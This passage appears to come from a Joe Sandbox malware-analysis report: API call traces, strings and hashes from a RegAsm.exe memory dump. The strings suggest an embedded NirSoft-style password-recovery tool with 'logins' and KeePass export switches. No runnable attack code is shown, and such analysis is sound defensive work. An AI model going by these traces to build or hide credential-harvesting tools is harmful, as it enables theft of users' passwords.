                                                                                                                                                • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                              • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                              • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                              • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                              • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                              • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                              • API String ID: 3330709923-517860148
                                                                                                                                              • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                              • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                              • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                              • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                              • memset.MSVCRT ref: 0040806A
                                                                                                                                              • memset.MSVCRT ref: 0040807F
                                                                                                                                              • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                              • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                              • memset.MSVCRT ref: 004081E4
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                              • String ID: logins$null
                                                                                                                                              • API String ID: 2148543256-2163367763
                                                                                                                                              • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                              • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                              • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                              • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                                                                              • memset.MSVCRT ref: 00408606
                                                                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                              • String ID: ---
                                                                                                                                              • API String ID: 3437578500-2854292027
                                                                                                                                              • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                              • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                                                                              • memset.MSVCRT ref: 00410892
                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1010922700-0
                                                                                                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                                                                              • free.MSVCRT ref: 004186C7
                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                              • free.MSVCRT ref: 004186E0
                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                              • free.MSVCRT ref: 00418716
                                                                                                                                              • free.MSVCRT ref: 0041872A
                                                                                                                                              • free.MSVCRT ref: 00418749
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                                                                                              • String ID: |A
                                                                                                                                              • API String ID: 3356672799-1717621600
                                                                                                                                              • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                              • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                              • API String ID: 2081463915-1959339147
                                                                                                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                              • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                              • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                              • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                              APIs
                                                                                                                                              • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                              • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                              • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                              • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                              • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                              • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                              • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                              • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1700100422-0
                                                                                                                                              • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                              • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                              • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                              • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                              APIs
                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                              • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                              • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                              • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                              • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 552707033-0
                                                                                                                                              • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                              • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                              • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                              • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_snwprintf
                                                                                                                                              • String ID: %%0.%df
                                                                                                                                              • API String ID: 3473751417-763548558
                                                                                                                                              • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                              • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                              • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                              • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                              APIs
                                                                                                                                              • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                              • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                              • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                              • GetParent.USER32(?), ref: 00406136
                                                                                                                                              • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                              • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                              • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                              • String ID: A
                                                                                                                                              • API String ID: 2892645895-3554254475
                                                                                                                                              • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                              • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                              • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                              • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                              APIs
                                                                                                                                              • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                              • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                              • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                              • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                              • memset.MSVCRT ref: 0040DA23
                                                                                                                                              • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                              • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                              • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                              • String ID: caption
                                                                                                                                              • API String ID: 973020956-4135340389
                                                                                                                                              • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                              • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                              • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                              • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                              • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                              • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                              • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: memset$_snwprintf$wcscpy
                                                                                                                                              • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                              • API String ID: 1283228442-2366825230
                                                                                                                                              • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                              • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                              • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                              • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                              APIs
                                                                                                                                              • wcschr.MSVCRT ref: 00413972
                                                                                                                                              • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                              • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                              • wcscat.MSVCRT ref: 004139DC
                                                                                                                                              • memset.MSVCRT ref: 004139B8
                                                                                                                                                • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                              • memset.MSVCRT ref: 00413A00
                                                                                                                                              • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                              • wcscat.MSVCRT ref: 00413A27
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                              • String ID: \systemroot
                                                                                                                                              • API String ID: 4173585201-1821301763
                                                                                                                                              • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                              • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                              • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                              • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleModule
                                                                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                              • API String ID: 4139908857-2887671607
                                                                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000014.00000002.467964730.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: wcscpy
                                                                                                                                              • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                              • API String ID: 1284135714-318151290
                                                                                                                                              • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                              • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                                                                              • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                                                                              • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                                                                              APIs
